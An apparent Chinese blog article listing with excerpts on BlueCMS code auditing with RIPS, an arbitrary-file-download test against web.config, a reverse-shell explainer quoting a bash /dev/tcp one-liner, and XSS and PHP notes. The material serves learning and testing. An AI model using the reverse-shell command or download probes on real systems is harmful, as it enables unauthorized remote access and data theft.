代码
文章平均质量分 52
shy014
这个作者很懒,什么都没留下…
展开
-
代码审计之rips之bluecms审计
rips是一款代码审计工具,下载下来并放在网站跟目录就可以了,然后直接通过浏览器访问,很简单,傻瓜式的使用。代码审计:https://nchc.dl.sourceforge.net/project/rips-scanner/rips-0.55.zip使用phpstudy搭建你要审计的网站bluecms。将rips解压放在网站根目录,然后使用浏览器访问。输入网站路径进行代码审计。一个一个的来看,先审计ad_js.php文件。存在sql注入漏洞:1,get方式传入了ad_id原创 2021-03-12 20:38:49 · 474 阅读 · 0 评论 -
记一次对任意下载文章的学习
原文地址:https://mp.weixin.qq.com/s/Nbbe23hIcnKakSbkQzlw1w查看下载功能点url:漏洞思路1:先访问下载的文件url是否在网站目录如是可尝试使用iis默认配置的web.config作为尝试/get/?d=now&f=/web.config(发现该网站的中间件是IIS,因此尝试下载web.config配置文件)(可以测试是否存在robots.txt和favicon.ico,index.php文件,用于测试否存在任意文件下载原创 2020-12-31 14:48:50 · 239 阅读 · 0 评论 -
详解反弹shell命令
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势:bash -i >& /dev/tcp/ip/port 0>&1bash -i本地打开一个bash>& 输出重定向,将标准输出和标准错误输出都重定向到远程。/dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...原创 2020-04-11 18:26:43 · 3554 阅读 · 0 评论 -
html学习笔记
HTML<div>标签<div> 标签定义 HTML 文档中的一个分隔区块或者一个区域部分文档中的一个区域将显示为蓝色:<div style="color:#0000FF"> <h3>这是一个在 div 元素中的标题。</h3> <p>这是一个在 div 元素中的文本。</p></...原创 2020-03-18 09:58:32 · 96 阅读 · 0 评论 -
PHP函数笔记
htmlspecialchars():将特殊字符转换为html实体$str = htmlspecialchars(string,flags,character-set,double_encode);string:规定要转换的字符串;flags :可选参数,规定如何处理引号、无效的编码以及使用哪种文档类型;character-set:可选参数,规定了要使用的字符集的字符串,e.g.U...原创 2020-01-20 14:19:29 · 512 阅读 · 0 评论 -
XSS函数研究
1,使用htmlspecialchars()函数将特殊字符转换为HTML实体<?php$name=$_GET["name"];$name=htmlspecialchars($name);?><input type='text' value='<?php echo $name?>'>被转换的预定义的字符有:&:转换为&...原创 2020-03-12 14:44:20 · 1226 阅读 · 0 评论